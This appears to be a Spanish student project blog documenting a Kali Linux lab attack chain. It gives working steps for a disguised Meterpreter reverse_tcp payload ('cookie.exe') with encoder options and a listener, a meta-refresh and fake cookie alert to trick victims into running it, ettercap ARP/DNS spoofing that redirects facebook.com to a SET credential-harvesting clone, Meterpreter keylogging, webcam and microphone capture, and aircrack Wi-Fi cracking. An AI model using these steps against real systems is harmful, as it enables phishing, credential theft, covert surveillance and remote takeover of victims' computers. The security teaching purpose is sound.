Video y Documentación

Hoy hemos acabado de grabar el video y pasaremos a editarlo, tambien terminaremos la documentación del trabajo.

Snort y Grabación del Proyecto

Hoy hemos investigado la herramienta snort.
También hemos comenzado a grabar un tutorial en video del proyecto el cual editaremos y presentaremos en CD el dia del proyecto. También hemos empezado la documentación del proyecto y el tutorial por escrito. El programa para realizar la grabación ha sido Record My Desktop de Ubuntu.

Desencriptación WEP/WPA/WPA2-PSK

Hoy hemos investigado herramientas para descifrar contraseñas de un Router Wifi, con Kali Linux.
Aircrack ha sido la herramienta estudiada. Hemos aplicado los conocimientos aprendidos para esta herramienta y nos ha dado resultado.

Comprobacion de lo aprendido

Hoy en el poco tiempo que hemos tenido de horas de proyecto hemos comprobado que todo lo aprendido y aplicado funcionaba correctamente. También hemos simulado el escenario de la presentación del proyecto y confirmado su  funcionamiento.

Meterpreter

Meterpreter es el exploit que realiza la conexión con el cliente una vez ejecutado el Payload en la victima.

Meterpreter tiene muchas funciones para realizar, algunas de ellas:
- webcam_list: Ver lista de cámaras
- run webcam 1: Ejecutar en live la primera webcam de la lista anterior
- webcam_snap: Hacer una foto y guardarla
- run sound_record -t 60: Graba 60 segundos de sonido y lo guarda
- screenshot: Hacer captura de pantalla
- ps: Ver los procesos y sus PID
- migrate: Migrar un proceso
- shell: Ejecuta terminal cmd
- upload: Subir una archivo
- download: Baja un archivo
- execute: Ejecuta archivos
- keyscan_start: Empieza el keylogger a registrar las teclas pulsadas
- keyscan_dump: Muestra todo lo registrado por el keylogger
- keyscan_stop: El keylogger para de registrar las teclas pulsadas
- search: Busca en el ordenador de la victima
- getprivs: Dar privilegios
- getuid: Nos muestra el tipo de usuario que esta ejecutándose ahora mismo
- sysinfo: Nos muestra información del sistema
- idletime: Permite mostrarnos el tiempo que el usuario a estado ausente

Como implementar Payload (III)

Finalmente, para que el cliente ejecute el payload lo hemos echo de la siguiente forma:

Primero de todo creamos un Payload con el nombre de cookie.exe y lo copiamos en var/www
Ahora abrimos la pagina fake con gedit, y escribimos justo después de <head> el siguiente código:

<meta http­equiv=”refresh” content=”2;cookie.exe”>

Y luego justo antes de cerrar el body, lo identificaremos con la etiqueta </body>, escribimos el siguiente script.

<script type=”text/javascript”> alert(“Para visualizar este sitio web, se requiera la instalación de un cookie”); </script>

Este código lo que hace es, primero se descargará el archivo cookie.exe, automáticamente pasado 2 segundos, y con el segundo código, va a aparecer una alerta en cuanto se cargue la pagina con el siguiente mensaje: Para visualizar este sitio web, se requiera la instalación de un cookie.Si la victima es tan ingenua como para ejecutar el cookie, ya podremos controlar su ordenador.

Como implementar Payload (II)

Bueno hoy hemos llegado a la conclusión de que, Javascript está muy controlado, por los navegadores y los firewall, por lo tanto hemos descartado la posibilidad de poder ejecutar 
automáticamente el Payload en la maquina de la victima.

Ahora hay que encontrar un modo de que el usuario se descargue el Payload y lo instalé pensando que es otra cosa que le haga falta o le provoque interés.

Como implementar Payload

Bien una vez realizado todo lo citado en la entrada "Creacion de Payload", solo queda que el cliente ejecute el Payload. En nuestro caso vamos a intentar buscar alguna forma de que cuando entre en nuestra pagina web se infecte automáticamente, sin que la victima se de cuenta.

Estableciendo el control de la victima

Ya tengamos el ejecutable, ahora lo vamos a dejar escuchando para que en cuanto la víctima ejecute el payload, se cree la conexión. Para ello entramos en msfconsole y ejecutamos lo sigiente:

# msfconsole

> use exploit/multi/handles

> set payload windows/meterpreter/reverse_tcp

> set lhost 192.168.1.99

> set lport 4444

> exploit

Y lo dejamos esperando a la respuesta del servidor.

Creación de Payload

Para crear el Payload, y así infectar la maquina de la victima, nos dirigimos a terminal y seguimos estos pasos:

# msfconsole

Una vez cargado el programa, vamos a elegir el siguiente payload:

> use windows/meterpreter/reverse_tcp

Ahora tenemos que configurar el lhost y lport.

Lhost: Ip del atacante.
Lport: Puerto por el que el atacante escucha.

> set lhost 192.168.1.99

> set lport 4444

Ahora vamos a ejecutar un comando para comprimir el payload con el siguiente

comando.

> generate ­e x86/shikata_ga_nai ­i 30 ­t exe ­f cookie.exe

Exploit y Payload

Hoy nos hemos estado informando sobre los conceptos de payload y exploit.


Exploit es todo el software que se utiliza para insertar un payload a través de una vunerabilidad y así poder aprovechar esta situación.


Payload es lo que se utiliza para aumentar la vunerabilidad, e infectar la maquina de la victima.

DNS Spoof (Resuelto)

Hoy hemos conseguido realizar la búsqueda por nombre en la victima. Y no rer



Para hacer DNS_Spoof correctamente no hace falta instalar BIND9, simplemente necesitamos SETOOLKIT (fake pagina) y ETTERCAP desde terminal (DNS y ARP spoofing).



Primero configuraremos el ficherito ettercap.dns que esta ubicado en: /etc/ettercap. Dentro del fichero creamos tres lineas con los siguientes parametros:
facebook.com A IP_atacante
*.facebook.com A IP_atacante
www.facebook.com PTR IP_atacante



 Una vez modificado correctamente el fichero ettercap.dns, nos vamos a la herramienta setoolkit y crearemos el fake de la pagina, simplemente indicando nuestra ip, y el nombre de la web que queremos copiar en nuestro caso www.facebook.com.



Una vez tengamos el fake de "www.facebook.com" creado (como hacerlo), abriremos la terminal de kali linux y escribiremos el siguiente comando para iniciar el ataque: ettercap -T -q -i eth0 -P dns_spoof -M arp // 



Con esto envenenaremos a toda la red, clonando la MAC del router y así reciviendo todas las peticiones. Finalmente funciona correctamente, y si en el navegador del cliente, escribimos facebook.com nos redirige hacia nuestra web falsa correctamente.

BIND9

Hoy hemos configurado el DNS falso de kali linux con BIND9.



Una vez hemos creado el servidor DNS hemos realizado el "fake" de facebook con SETOOLKIT, seguidamente hemos hecho ARP spoofing con DNSSPLOIT y finalmente hemos iniciado ETTERCAP para realizar DNS spoofing...



El resultado ha sido que desde el cliente o victima mejor dicho podemos ver el fake poniendo la IP de kali linux pero no resuelve por nombre "www.facebook.com".



En la terminal de la victima si tecleamos tanto tracert como ping a www.facebook.com nos redirecciona a la IP de Kali... Tambien haciendo nslookup a www.facebook.com nos da la IP de Kali, y para comprobar que hemos realizado el ARP spoofing hemos puesto arp -a en cmd y nos marcaba que se habia suplantado correctamente la MAC de las IP.

DNS y ARP Spoof

Arp-spoofing



Con el metaspolit, hemos configurado el arp-spoofing para clonar la mac del gateway, y así dirigir las peticiones al atacante.



Dns-spoofing



Con ettercap grafico hemos activado el dns-spoofing, con lo qual hacemos creer al cliente que el atacante es el dns, y junto al fichero etc/ettercap/etter.dns configuramos la resolucion de nombres.

Pero no nos hace el spoof correctamente, por que en el cliente hacemos un tracert www.facebook.com y el primer salto no se dirige hacia nuestra IP. Seguiremos investigando.

Web Fake

Hoy hemos configurado la Web fake:

Web Fake

Con el setoolkit hemos clonado una web, para crear la web fake y proporcionarla en lugar de la web verdadera al cliente.

Para creala, hemos ejecutado una terminal, hemos iniciado el comando:

 # Setoolkit

Y hemos escojido las distintas opciones:

1) Social­Engineering Attacks

2) Website Attack Vector

3) Credential Harvester Attack Method

2) Site Cloner

Ahora nos pedirá que intoroduzcamos una IP, ponemos la del atacante. Acto seguido nos
va a pedir la dirección web de la pagina que queremos clonar, en nuestro caso https://www.facebook.com
Empezará a copiar la pagina web, y finalmente nos dice que si queremos iniciar el servicio de Apache, indicamos que si.
Ya tenemos la pagina web de facebook clonada, si en el navegador web, ponemos la ip del atacante, saldrá nuestra pagina web fake.

Setoolkit y Ettercap

Hoy hemos investigado las herramientas ettercap-graphical, setoolkit y el concepto dnsspoof.

Ettercap-Graphical es un sniffer que hemos utilziado para analizar la red y comprobar las MAC e IP de los hosts conectados.

Setoolkit es un programa para crear Fake de páginas web.

Estudiando el concepto dnsspoof primero explicaremos ARP Spoofing.

• ARP Spoofing és enviar mensajes ARP "( protocolo de la capa de enlace de datos responsable de encontar la direccion hardware [Ethernet MAC] que corresponde a una determinada dirección IP)" falsos a la Ethernet.
• Hemos utilizado la herramienta "WebSploit" de Kali Linux, con ayuda de este tutorial.
• DNSSPOOF...Cuando logramos hacer un ARP Spoofing, esta herramineta crea un sencillo servidor DNS y redirecciona las consultas de nombres de los clientes a este último servidor.  Esto hace que, si nuestra víctima quiere saber la dirección IP de tiwtter.com, por ejemplo, nos la redireccione a otra IP, como podría ser a nuestra propia IP, y que esta tenga montada un seridor Web con un Scam que robe sus datos.

Openvas (II) y Nmap

Hoy hemos conseguido entrar y configurar correctamente el Openvas y solucionar el problema de los usuarios y contraseñas. Pero no nos ha gustado mucho este programa porque, para las prestaciones que nos da, nmap, consume muchos menos recursos, y hace una funcion parecidad, por lo tanto hemos cambiado OpenVas por Nmap.

Y con el Nmap hemos escaneado la red y averiguado los sistemas operativos y Ips de la red.

OpenVas (II)

OpenVas

OpenVas nos está dando problemas, principalmente por que para iniciarlo, hay que activar servicio apache para que nos active el portal web, hay que crear un certificado, y usuario administrador, pero menos la activación del portal, web, lo demás no encontramos la manera de hacerlo correctamente.

Por lo tanto podemos acceder a login del programa, pero no podemos logearnos correctamente. Seguiremos investigando.